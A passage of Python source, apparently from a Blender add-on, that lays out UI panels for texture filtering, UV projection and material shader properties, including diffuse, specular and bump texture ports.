texture_node.use_mirror_y\n\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\temboss=False)\n\t\trow.prop(texture_node, \"repeat_y\", text=\"Repeat Y\")\n\t\trow.active = (texture_node.repeat_y > 1)\n\n\telif texture_node.extension == 'CHECKER':\n\t\trow = col.row(align=True)\n\t\trow.prop(texture_node, \"use_checker_even\", text=\"Even\",\n\t\t\ticon_value=(ico[\"toggle_on\"].icon_id\n\t\t\tif texture_node.use_checker_even\n\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\temboss=False)\n\t\trow.prop(texture_node, \"use_checker_odd\", text=\"Odd\",\n\t\t\ticon_value=(ico[\"toggle_on\"].icon_id\n\t\t\tif texture_node.use_checker_odd\n\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\temboss=False)\n\n\t\tcol = box.column(align=True)\n\t\tcol.prop(texture_node, \"checker_distance\", text=\"Distance\")\n\n\tcol.label(text=\"Crop:\")\n\trow = col.row(align=True)\n\trow.prop(texture_node, \"crop_min_y\", text=\"Min Y\")\n\trow.prop(texture_node, \"crop_max_x\", text=\"Max X\")\n\trow = col.row(align=True)\n\trow.prop(texture_node, \"crop_min_x\", text=\"Min X\")\n\trow.prop(texture_node, \"crop_max_y\", text=\"Max Y\")\n\ndef common_texture_filter(tex, col):\n\trow = col.row(align=True)\n\trow.label(text=\":: Filter Properties\" )\n\trow.label(text=\"\" )\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"filter_type\", text=\"\")\n\tif tex.use_mipmap and tex.filter_type in {'AREA', 'EWA', 'FELINE'}:\n\t\tif tex.filter_type == 'FELINE':\n\t\t\trow.prop(tex, \"filter_probes\", text=\"Probes\")\n\t\telse:\n\t\t\trow.prop(tex, \"filter_eccentricity\", text=\"Eccentricity\")\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_filter_size_min\", text=\"Min Size\")\n\trow.prop(tex, \"filter_size\")\n\ndef uv_projection_layout(layout, texture_slot, object_node):\n\tr\"\"\"UV layout and project types \"\"\"\n\tbox = layout.box()\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\trow.prop(texture_slot, \"texture_coords\", text=\"\")\n\trow.prop(texture_slot, \"mapping\", text=\"\")\n\tif texture_slot.texture_coords == 'UV':\n\t\trow.prop_search(texture_slot, \"uv_layer\", object_node.data, \"uv_textures\", text=\"\")\n\telif texture_slot.texture_coords == 'OBJECT':\n\t\trow.prop(texture_slot, \"object\", text=\"\")\n\trow.operator(\"mesh.uv_texture_add\", text=\"\", icon='ZOOMIN')\n\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\tif texture_slot.texture_coords in {'ORCO', 'UV'}:\n\t\trow.prop(texture_slot, \"use_from_dupli\", text=\"\",\n\t\t\t\t icon_value=(ico[\"toggle_on\"].icon_id\n\t\t\t\t\t\t\t\tif texture_slot.use_from_dupli\n\t\t\t\t\t\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\n\trow.prop(texture_slot, \"mapping_x\", text=\"\")\n\trow.prop(texture_slot, \"mapping_y\", text=\"\")\n\trow.prop(texture_slot, \"mapping_z\", text=\"\")\n\n\tcol = box.column(align=True)\n\trow = box.row(align=True)\n\trow = col.row(align=True)\n\n\trow.column().prop(texture_slot, \"offset\")\n\trow.column().prop(texture_slot, \"scale\")\n\ndef texture_sampling_layout(layout, texture_slot):\n\tslot = texture_slot #getattr(context, \"texture_slot\", None)\n\ttex = slot.texture #context.texture\n\tbox = layout.box()\n\tcol = box.column(align=True)\n\n\trow = col.row(align=True)\n\trow.label(text=\":: Alpha Properties\" )\n\trow.label(text=\"\" )\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_preview_alpha\")\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_alpha\", text=\"Use\")\n\trow.prop(tex, \"use_calculate_alpha\", text=\"Calculate\")\n\n\trow = 
col.row(align=True)\n\trow.prop(tex, \"invert_alpha\", text=\"Invert\")\n\trow.prop(tex, \"use_flip_axis\", text=\"Flip X/Y Axis\")\n\n\tcol.separator()\n\trow = col.row(align=True)\n\trow.label(text=\":: Normal Properties\" )\n\trow.label(text=\"\" )\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_normal_map\")\n\trow.active = tex.use_normal_map\n\trow.prop(slot, \"normal_map_space\", text=\"\")\n\trow.active = tex.use_normal_map\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_mipmap\")\n\trow.prop(tex, \"use_derivative_map\")\n\trow.active = tex.use_mipmap\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_mipmap_gauss\", text =\"MIP Blur\")\n\trow.prop(tex, \"use_interpolation\")\n\n\tcol.separator()\n\tcommon_texture_filter(tex, col)\n\ndef texture_influence_layout(layout, texture_slot, port_type=\"diffuse\"):\n\ttex = texture_slot\n\tbox =layout.box()\n\tcol = box.column()\n\tif port_type == \"diffuse\":\n\t\tGUI.button_slider(col, texture_slot, \"use_map_diffuse\", \"diffuse_factor\", \"Intensity\")\n\t\tGUI.button_slider(col, texture_slot, \"use_map_color_diffuse\", \"diffuse_color_factor\", \"Color\")\n\t\tGUI.button_slider(col, texture_slot, \"use_map_alpha\", \"alpha_factor\", \"Alpha\")\n\t\tGUI.button_slider(col, texture_slot, \"use_map_translucency\", \"translucency_factor\", \"Translucency\")\n\tif port_type == \"specular\":\n\t\tGUI.button_slider(col, texture_slot,\"use_map_specular\", \"specular_factor\", \"Intensity\")\n\t\tGUI.button_slider(col, texture_slot,\"use_map_hardness\", \"hardness_factor\", \"Hardness\")\n\t\tGUI.button_slider(col, texture_slot,\"use_map_color_spec\", \"specular_color_factor\", \"Color\")\n\tcol = box.column(align=False)\n\trow = col.row(align =True)\n\trow.prop(texture_slot, \"blend_type\", text=\"\")\n\trow = col.row(align =True)\n\trow.prop(texture_slot, \"invert\", text=\"Negative\")\n\trow.prop(texture_slot, \"use_stencil\")\n\t# color is used on gray-scale textures even when use_rgb_to_intensity is disabled.\n\trow = col.row(align =True)\n\trow.prop(texture_slot, \"use_rgb_to_intensity\")\n\tif texture_slot.use_rgb_to_intensity:\n\t\trow.prop(texture_slot, \"color\", text=\"\")\n\n\trow = col.row(align =True)\n\trow.prop(texture_slot, \"default_value\", text=\"DVar\", slider=True)\n\ndef shader_property_layout(context, layout, material):\n\tcol = layout.column(align=True)\n\trow = col.row(align=True)\n\trow.operator(\"wm.bsi_decorator_button\", text=\"\", emboss=False) # pushes to the right top buttons\n\n\trow.prop( material.BSI, \"shader_stand\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_strand_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_stand\n\t\t\t\t\t\t\telse ico[\"shader_strand_off\"].icon_id ),\n\t\t\t emboss=False)\n\n\trow.prop( material.BSI, \"indirect_illum\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_shading_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.indirect_illum\n\t\t\t\t\t\t\telse ico[\"shader_shading_off\"].icon_id ),\n\t\t\t emboss=False)\n\n\trow.prop( material.BSI, \"shader_rendering\", text=\"\",\n\t\t\t icon=('RESTRICT_RENDER_OFF'\n\t\t\t\t\t\t\tif material.BSI.shader_rendering\n\t\t\t\t\t\t\telse 'RESTRICT_RENDER_ON' ),\n\t\t\t emboss=False)\n\n\trow.prop( material.BSI, \"shader_shadow\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_shadow_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_shadow\n\t\t\t\t\t\t\telse ico[\"shader_shadow_off\"].icon_id ),\n\t\t\t emboss=False)\n\n\trow.prop( material.BSI, \"shader_sss\", text=\"\",\n\t\t\t 
icon_value=(ico[\"shader_sss_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_sss\n\t\t\t\t\t\t\telse ico[\"shader_sss_off\"].icon_id ),\n\t\t\t emboss=False)\n\trow.prop( material.BSI, \"shader_transparency\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_transparency_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_transparency\n\t\t\t\t\t\t\telse ico[\"shader_transparency_off\"].icon_id ),\n\t\t\t emboss=False)\n\trow.prop( material.BSI, \"shader_reflection\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_reflect_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_reflection\n\t\t\t\t\t\t\telse ico[\"shader_reflect_off\"].icon_id ),\n\t\t\t emboss=False)\n\n\tif material.BSI.shader_stand:\n\t\tshader_strand_layout(context, layout, material)\n\n\tif material.BSI.indirect_illum:\n\t\tshader_indirect_illum_layout(layout, material)\n\n\tif material.BSI.shader_rendering:\n\t\tshader_rendering_layout(layout, material)\n\n\tif material.BSI.shader_shadow:\n\t\tshader_shadow_layout(layout, material)\n\n\tif material.BSI.shader_sss:\n\t\tshader_sss(layout, material)\n\n\tif material.BSI.shader_transparency:\n\t\tshader_transparency(layout, material)\n\n\tif material.BSI.shader_reflection:\n\t\tshader_reflection(layout, material)\n\ndef shader_ramp_layout(layout, material):\n\tbox = layout.box()\n\tbox.prop(material, \"use_diffuse_ramp\", text=\"Use Ramp Shader\")\n\tif material.use_diffuse_ramp:\n\t\tcol = box.column()\n\t\tcol.active = (not material.use_shadeless)\n\t\tcol.separator()\n\t\tcol.template_color_ramp(material, \"diffuse_ramp\", expand=True)\n\t\tcol.separator()\n\n\t\trow = col.row()\n\t\trow.prop(material, \"diffuse_ramp_input\", text=\"Input\")\n\t\trow.prop(material, \"diffuse_ramp_blend\", text=\"Blend\")\n\n\t\tcol.prop(material, \"diffuse_ramp_factor\", text=\"Factor\")\n\ndef shader_strand_layout(context, layout, material):\n\tbox = layout.box()\n\tbox.label(text=\"Strand Properties\")\n\ttan = material.strand\n\n\tcol = box.column(align=True)\n\tcol.prop(tan, \"use_blender_units\")\n\tcol.prop(tan, \"root_size\", text=\"Size Root\")\n\tcol.prop(tan, \"tip_size\", text=\"Size Tip\")\n\tcol.prop(tan, \"size_min\", text=\"Size Min\")\n\n\tcol = box.column(align=True)\n\tcol.active = (not material.use_shadeless)\n\tcol.prop(tan, \"use_tangent_shading\")\n\tcol.prop(tan, \"shape\", text=\"Tangent Shape\")\n\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\trow.prop(tan, \"width_fade\", text=\"Shading\")\n\tif context.object and context.object.type == 'MESH':\n\t\trow.prop_search(tan, \"uv_layer\", context.object.data, \"uv_textures\", text=\"\")\n\telse:\n\t\trow.prop(tan, \"uv_layer\", text=\"\")\n\tcol.label(\"Surface diffuse:\")\n\tcol.prop(tan, \"blend_distance\", text=\"Distance\")\n\ndef shader_indirect_illum_layout(layout, material):\n\tbox = layout.box()\n\tbox.label(text=\"Indirect Illumination Properties\")\n\tif material.type in {'SURFACE', 'WIRE'}:\n\t\tcol = box.column(align=True)\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_shadeless\", text=\"Constant\")\n\t\tcol.active = not material.use_shadeless\n\t\trow.prop(material, \"emit\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_tangent_shading\", text=\"Tangent\")\n\t\trow.prop(material, \"ambient\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_cubic\", text=\"Cubic \")\n\t\trow.prop(material, \"translucency\")\n\ndef shader_rendering_layout(layout, material):\n\tbox = layout.box()\n\tcol = box.column(align=True)\n\trow = 
col.row(align=True)\n\trow.label(text=\":: Rendering\")\n\trow.label(text=\"\")\n\n\trow = col.row(align=True)\n\tif not material.use_nodes:\n\t\trow.prop(material, \"use_raytrace\")\n\t\trow.prop(material, \"use_sky\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_full_oversampling\", text=\"Oversampling\")\n\trow.prop(material, \"use_mist\")\n\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\tif not material.use_nodes:\n\t\trow.prop(material, \"invert_z\")\n\t\tsub = row.row()\n\t\tsub.active = material.use_transparency and material.transparency_method == 'Z_TRANSPARENCY'\n\t\tsub.prop(material, \"offset_z\")\n\n\tcol.separator()\n\trow = col.row(align=True)\n\trow.label(text=\":: Shading\")\n\trow.label(text=\"\")\n\n\trow = col.row(align=True)\n\trow.prop(material, \"use_face_texture\")\n\tsub = row.column()\n\tsub.active = material.use_face_texture\n\tsub.prop(material, \"use_face_texture_alpha\", text=\"Use Alpha\")\n\n\trow = col.row(align=True)\n\trow.prop(material, \"use_vertex_color_paint\")\n\trow.prop(material, \"use_vertex_color_light\")\n\n\trow = col.row(align=True)\n\trow.prop(material, \"use_object_color\")\n\trow.prop(material, \"use_uv_project\")\n\n\trow = col.row(align=True)\n\trow.label(text=\":: Lighting\")\n\trow.label(text=\"\")\n\n\tcol.separator()\n\trow = col.row()\n\trow.prop(material, \"light_group\", text=\"Light Group:\")\n\tif not material.use_nodes:\n\t\trow.prop(material, \"pass_index\")\n\n\trow = col.row(align=True)\n\trow.active = bool(material.light_group)\n\trow.prop(material, \"use_light_group_exclusive\", text=\"Exclusive\")\n\trow.prop(material, \"use_light_group_local\", text=\"Local\")\n\ndef shader_shadow_layout(layout, material):\n\tbox = layout.box()\n\tbox.label(text=\"Shadow Properties\")\n\tif not material.use_nodes:\n\t\tcol = box.column()\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_shadows\", text=\"Receive\")\n\t\trow.prop(material, \"use_cast_shadows\", text=\"Cast\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_transparent_shadows\", text=\"Receive Transparent\")\n\t\trow.prop(material, \"use_cast_shadows_only\", text=\"Cast Only\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_cast_approximate\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_only_shadow\", text=\"Shadows Only\")\n\t\trow.active = material.use_only_shadow\n\t\trow.prop(material, \"shadow_only_type\", text=\"\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_cast_buffer_shadows\")\n\t\trow.active = material.use_cast_buffer_shadows\n\t\trow.prop(material, \"shadow_buffer_bias\", text=\"Buffer Bias\")\n\t\trow = col.row(align=True)\n\t\trow.label(text=\"\")\n\t\trow.active = material.use_cast_buffer_shadows\n\t\trow.prop(material, \"shadow_cast_alpha\", text=\"Casting Alpha\")\n\trow = col.row(align=True)\n\trow.prop(material, \"use_ray_shadow_bias\", text=\"Auto Ray Bias\")\n\trow.active = (not material.use_ray_shadow_bias)\n\trow.prop(material, \"shadow_ray_bias\", text=\"Ray Bias\")\n\ndef shader_sss(layout, material):\n\tsss = material.subsurface_scattering\n\tbox = layout.box()\n\tbox.prop(sss, \"use\", text=\"Subsurface Scattering\")\n\n\tif sss.use:\n\t\trow = box.row().split()\n\t\tsub = row.row(align=True).split(align=True, percentage=0.75)\n\t\tsub.menu(\"MATERIAL_MT_sss_presets\", text=bpy.types.MATERIAL_MT_sss_presets.bl_label)\n\t\tsub.operator(\"material.sss_preset_add\", text=\"\", icon='ZOOMIN')\n\t\tsub.operator(\"material.sss_preset_add\", 
text=\"\", icon='ZOOMOUT').remove_active = True\n\n\t\tsplit = box.split()\n\n\t\tcol = split.column()\n\t\tcol.prop(sss, \"ior\")\n\t\tcol.prop(sss, \"scale\")\n\t\tcol.prop(sss, \"color\", text=\"\")\n\t\tcol.prop(sss, \"radius\", text=\"RGB Radius\", expand=True)\n\n\t\tcol = split.column()\n\t\tsub = col.column(align=True)\n\t\tsub.label(text=\"Blend:\")\n\t\tsub.prop(sss, \"color_factor\", text=\"Color\")\n\t\tsub.prop(sss, \"texture_factor\", text=\"Texture\")\n\t\tsub.label(text=\"Scattering Weight:\")\n\t\tsub.prop(sss, \"front\")\n\t\tsub.prop(sss, \"back\")\n\t\tcol.separator()\n\t\tcol.prop(sss, \"error_threshold\", text=\"Error\")\n\ndef shader_transparency(layout, material):\n\tbox = layout.box()\n\tbox.prop(material, \"use_transparency\", text=\"Transparency\")\n\tif material.use_transparency:\n\t\trt_transparency = material.raytrace_transparency\n\t\trow = box.row()\n\t\trow.active = material.use_transparency\n\t\trow.prop(material, \"transparency_method\", expand=True)\n\n\t\tsplit = box.split()\n\t\tsplit.active = material.use_transparency\n\n\t\tcol = split.column()\n\t\tcol.prop(material, \"alpha\")\n\t\trow = col.row()\n\t\trow.active = (material.transparency_method != 'MASK') and (not material.use_shadeless)\n\t\trow.prop(material, \"specular_alpha\", text=\"Specular\")\n\n\t\tcol = split.column()\n\t\tcol.active = (not material.use_shadeless)\n\t\tcol.prop(rt_transparency, \"fresnel\")\n\t\tsub = col.column()\n\t\tsub.active = (rt_transparency.fresnel > 0.0)\n\t\tsub.prop(rt_transparency, \"fresnel_factor\", text=\"Blend\")\n\n\t\tif material.transparency_method == 'RAYTRACE':\n\t\t\tbox.separator()\n\t\t\tsplit = box.split()\n\t\t\tsplit.active = material.use_transparency\n\n\t\t\tcol = split.column()\n\t\t\tcol.prop(rt_transparency, \"ior\")\n\t\t\tcol.prop(rt_transparency, \"filter\")\n\t\t\tcol.prop(rt_transparency, \"falloff\")\n\t\t\tcol.prop(rt_transparency, \"depth_max\")\n\t\t\tcol.prop(rt_transparency, \"depth\")\n\n\t\t\tcol = split.column()\n\t\t\tcol.label(text=\"Gloss:\")\n\t\t\tcol.prop(rt_transparency, \"gloss_factor\", text=\"Amount\")\n\t\t\tsub = col.column()\n\t\t\tsub.active = rt_transparency.gloss_factor < 1.0\n\t\t\tsub.prop(rt_transparency, \"gloss_threshold\", text=\"Threshold\")\n\t\t\tsub.prop(rt_transparency, \"gloss_samples\", text=\"Samples\")\n\ndef shader_reflection(layout, material):\n\trefl_mat = material.raytrace_mirror\n\tbox = layout.box()\n\tbox.prop(refl_mat, \"use\", text=\"Reflection\")\n\n\tif refl_mat.use:\n\t\tbox.active = refl_mat.use\n\n\t\tsplit = box.split()\n\n\t\tcol = split.column()\n\t\tcol.prop(refl_mat, \"reflect_factor\")\n\t\tcol.prop(material, \"mirror_color\", text=\"\")\n\n\t\tcol = split.column()\n\t\tcol.prop(refl_mat, \"fresnel\")\n\t\tsub = col.column()\n\t\tsub.active = (refl_mat.fresnel > 0.0)\n\t\tsub.prop(refl_mat, \"fresnel_factor\", text=\"Blend\")\n\n\t\tsplit = box.split()\n\n\t\tcol = split.column()\n\t\tcol.separator()\n\t\tcol.prop(refl_mat, \"depth\")\n\t\tcol.prop(refl_mat, \"distance\", text=\"Max Dist\")\n\t\tcol.separator()\n\t\tsub = col.split(percentage=0.4)\n\t\tsub.active = (refl_mat.distance > 0.0)\n\t\tsub.label(text=\"Fade To:\")\n\t\tsub.prop(refl_mat, \"fade_to\", text=\"\")\n\n\t\tcol = split.column()\n\t\tcol.label(text=\"Gloss:\")\n\t\tcol.prop(refl_mat, \"gloss_factor\", text=\"Amount\")\n\t\tsub = col.column()\n\t\tsub.active = (refl_mat.gloss_factor < 1.0)\n\t\tsub.prop(refl_mat, \"gloss_threshold\", text=\"Threshold\")\n\t\tsub.prop(refl_mat, \"gloss_samples\", 
text=\"Samples\")\n\t\tsub.prop(refl_mat, \"gloss_anisotropic\", text=\"Anisotropic\")\n\ndef material_panel(layout, context):\n\tmaterial = context.active_object.active_material\n\n\tob = context.active_object\n\tis_sortable = (len(ob.material_slots) > 1)\n\trows = 1\n\tif is_sortable:\n\t\trows = 4\n\tlayout.template_list(\"MATERIAL_UL_matslots\", \"\", ob, \"material_slots\", ob, \"active_material_index\", rows=rows)\n\tlayout.template_ID(ob, \"active_material\", new=\"material.new\")\n\n\tif material!= None:\n\t\tscene = context.scene\n\t\tob = context.active_object\n\n\t\tdiff_texture_slot = material.texture_slots[0]\n\t\tspec_texture_slot = material.texture_slots[1]\n\t\tnrml_texture_slot = material.texture_slots[2]\n\t\trefl_texture_slot = material.texture_slots[3]\n\t\ttrns_texture_slot = material.texture_slots[4]\n\n\t\tshader_property_layout(context, layout, material)\n\n\t\t##########################################################\n\t\t# DIFFUSE PORT\n\t\t##########################################################\n\t\tsplit = layout.split(percentage=0.1)\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"diffuse_color\", text=\"\")\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"diffuse_shader\", text=\"\")\n\t\trow.prop(material, \"diffuse_intensity\", text=\"Intensity\")\n\t\tcol = layout.column(align=True)\n\t\trow = col.row(align=True)\n\t\trow.operator(\"wm.bsi_decorator_button\", text=\"DIFFUSE PORT\", emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_image\", text=\"\",\n\t\t\t\t icon=('TEXTURE'\n\t\t\t\t\t\t\t\tif material.BSI.diff_image\n\t\t\t\t\t\t\t\telse 'IMASEL' ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_uvs\", text=\"\",\n\t\t\t\t icon_value=(ico[\"uv_conn\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.diff_uvs\n\t\t\t\t\t\t\t\telse ico[\"uv\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_sampling\", text=\"\",\n\t\t\t\t icon_value=(ico[\"sampling_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.diff_sampling\n\t\t\t\t\t\t\t\telse ico[\"sampling_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_influence\", text=\"\",\n\t\t\t\t icon_value=(ico[\"influences_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.diff_influence\n\t\t\t\t\t\t\t\telse ico[\"influences_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_ramp\", text=\"\",\n\t\t\t\t icon_value=(ico[\"ramp_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.diff_ramp\n\t\t\t\t\t\t\t\telse ico[\"ramp_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\tif material.BSI.diff_image:\n\t\t\tif diff_texture_slot != None:\n\t\t\t\tcol = layout.column(align=True)\n\t\t\t\trow = col.row(align=True)\n\n\t\t\t\tdiff_port = row.operator(\"bsi.apply_texture_image\", text=\"Re-Apply New Diffuse Image\")\n\t\t\t\tdiff_port.mat_port_type = \"diffuse\"\n\n\t\t\t\tprop = row.operator(\"bsi.clear_texture_slot\" ,text=\"\",icon = 'X', emboss=True)\n\t\t\t\tprop.port_type= \"diffuse\"\n\n\t\t\t\trow = col.row(align=True)\n\t\t\t\trow.label(text=\"\") #spacer align to the right\n\t\t\t\trow.prop(material.BSI, \"diff_img_display\", text=\"\",\n\t\t\t\t\t\t icon=('VISIBLE_IPO_ON'\n\t\t\t\t\t\t\t\t\t\tif material.BSI.diff_img_display\n\t\t\t\t\t\t\t\t\t\telse 'VISIBLE_IPO_OFF'),\n\t\t\t\t\t\t emboss=False)\n\t\t\t\tif material.BSI.diff_img_display:\n\t\t\t\t\tbox = layout.box()\n\t\t\t\t\tbox.label(text=\"UGLY BLENDER DESIGN---> CAN'T FIX\")\n\t\t\t\t\tbox.template_image(diff_texture_slot.texture, \"image\", 
diff_texture_slot.texture.image_user)\n\t\t\telse:\n\t\t\t\tdiff_port = layout.operator(\"bsi.apply_texture_image\", text=\"Load Diffuse Image\")\n\t\t\t\tdiff_port.mat_port_type = \"diffuse\"\n\n\t\tif material.BSI.diff_uvs:\n\t\t\tif diff_texture_slot != None:\n\t\t\t\tuv_projection_layout(layout, diff_texture_slot, ob)\n\t\t\t\tuv_tiling_layout(layout, diff_texture_slot.texture)\n\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.diff_sampling:\n\t\t\tif diff_texture_slot != None:\n\t\t\t\ttexture_sampling_layout(layout, diff_texture_slot)\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.diff_influence:\n\t\t\tif diff_texture_slot != None:\n\t\t\t\ttexture_influence_layout(layout, diff_texture_slot, port_type=\"diffuse\")\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.diff_ramp:\n\t\t\tshader_ramp_layout(layout, material)\n\t\t##########################################################\n\t\t# SPECULAR PORT\n\t\t##########################################################\n\t\tsplit = layout.split(percentage=0.1)\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"specular_color\", text=\"\")\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"specular_shader\", text=\"\")\n\t\trow.prop(material, \"specular_intensity\", text=\"Intensity\")\n\n\t\tcol = layout.column(align=True)\n\t\trow = col.row(align=True)\n\t\trow.operator(\"wm.bsi_decorator_button\", text=\"SPECULAR PORT\", emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_image\", text=\"\",\n\t\t\t\t icon=('TEXTURE'\n\t\t\t\t\t\t\t\tif material.BSI.spec_image\n\t\t\t\t\t\t\t\telse 'IMASEL' ),\n\t\t\t\t emboss=False)\n\t\trow.prop( material.BSI, \"spec_uvs\", text=\"\",\n\t\t\t\t icon_value=(ico[\"uv_conn\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_uvs\n\t\t\t\t\t\t\t\telse ico[\"uv\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_sampling\", text=\"\",\n\t\t\t\t icon_value=(ico[\"sampling_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_sampling\n\t\t\t\t\t\t\t\telse ico[\"sampling_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_influence\", text=\"\",\n\t\t\t\t icon_value=(ico[\"influences_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_influence\n\t\t\t\t\t\t\t\telse ico[\"influences_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_ramp\", text=\"\",\n\t\t\t\t icon_value=(ico[\"ramp_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_ramp\n\t\t\t\t\t\t\t\telse ico[\"ramp_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\tif material.BSI.spec_image:\n\t\t\tif spec_texture_slot != None:\n\t\t\t\tcol = layout.column(align=True)\n\t\t\t\trow = col.row(align=True)\n\n\t\t\t\tspec_port = row.operator(\"bsi.apply_texture_image\", text=\"Re-Apply New Specular Image\")\n\t\t\t\tspec_port.mat_port_type = \"specular\"\n\n\t\t\t\tprop = row.operator(\"bsi.clear_texture_slot\" ,text=\"\",icon = 'X', emboss=True)\n\t\t\t\tprop.port_type= \"specular\"\n\n\t\t\t\trow = col.row(align=True)\n\t\t\t\trow.label(text=\"\") #spacer align to the right\n\t\t\t\trow.prop(material.BSI, \"spec_img_display\", text=\"\",\n\t\t\t\t\t\t icon=('VISIBLE_IPO_ON'\n\t\t\t\t\t\t\t\t\t\tif material.BSI.spec_img_display\n\t\t\t\t\t\t\t\t\t\telse 'VISIBLE_IPO_OFF'),\n\t\t\t\t\t\t emboss=False)\n\t\t\t\tif material.BSI.spec_img_display:\n\t\t\t\t\tbox = layout.box()\n\t\t\t\t\tbox.label(text=\"UGLY BLENDER DESIGN---> CAN'T 
FIX\")\n\t\t\t\t\tbox.template_image(spec_texture_slot.texture, \"image\", spec_texture_slot.texture.image_user)\n\t\t\telse:\n\t\t\t\tspec_port = layout.operator(\"bsi.apply_texture_image\", text=\"Load Specular Image\")\n\t\t\t\tspec_port.mat_port_type = \"specular\"\n\n\t\tif material.BSI.spec_uvs:\n\t\t\tif spec_texture_slot != None:\n\t\t\t\tuv_projection_layout(layout, spec_texture_slot, ob)\n\t\t\t\tuv_tiling_layout(layout, spec_texture_slot.texture)\n\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.spec_sampling:\n\t\t\tif spec_texture_slot != None:\n\t\t\t\ttexture_sampling_layout(layout, spec_texture_slot)\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.spec_influence:\n\t\t\tif spec_texture_slot != None:\n\t\t\t\ttexture_influence_layout(layout, spec_texture_slot, port_type=\"specular\")\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.spec_ramp:\n\t\t\tshader_ramp_layout(layout, material)\n\t\t##########################################################\n\t\t# NORMAL - BUMP PORT\n\t\t##########################################################\n\t\tsplit = layout.split(percentage=0.1)\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"diffuse_color\", text=\"\")\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"diffuse_shader\", text=\"\")\n\t\trow.prop(material, \"diffuse_intensity\", text=\"Intensity\")\n\t\tcol = layout.column(align=True)\n\t\trow = col.row(align=True)\n\t\trow.operator(\"wm.bsi_decorator_button\", text=\"BUMP PORT\", emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_image\", text=\"\",\n\t\t\t\t icon=('TEXTURE'\n\t\t\t\t\t\t\t\tif material.BSI.spec_image\n\t\t\t\t\t\t\t\telse 'IMASEL' ),\n\t\t\t\t emboss=False)\n\t\trow.prop( material.BSI, \"spec_uvs\", text=\"\",\n\t\t\t\t icon_value=(ico[\"uv_conn\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_uvs\n\t\t\t\t\t\t\t\telse ico[\"uv\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_sampling\", text=\"\",\n\t\t\t\t icon_value=(ico[\"sampling_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_sampling\n\t\t\t\t\t\t\t\telse 